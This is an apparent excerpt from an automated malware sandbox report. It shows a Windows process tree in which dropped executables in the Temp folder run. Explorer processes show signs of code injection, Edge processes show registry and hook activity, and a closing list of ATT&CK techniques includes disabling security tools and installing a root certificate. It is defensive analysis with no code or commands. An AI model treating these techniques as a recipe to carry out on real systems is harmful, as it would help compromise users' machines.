C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:4168
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4580
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4816
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\58451160d3384d5b9289df61b75dd310 /t 0 /p 48161⤵PID:5768
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:6048
-
C:\Users\Admin\AppData\Local\Temp\686A.exeC:\Users\Admin\AppData\Local\Temp\686A.exe1⤵
- Executes dropped EXE
- Drops startup file
- Loads dropped DLL
- NTFS ADS
PID:1140
-
C:\Users\Admin\AppData\Local\Temp\724F.exeC:\Users\Admin\AppData\Local\Temp\724F.exe1⤵
- Executes dropped EXE
PID:6008
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4944
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:5940
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5944
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:5404
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5908
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:2404
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1444
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4312
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3948
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:5508
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4804
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:6116
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:5848
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3596
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:5036
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4924
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4772
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4476
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
BITS Jobs
1Disabling Security Tools
2Install Root Certificate
1Modify Registry
5Web Service
1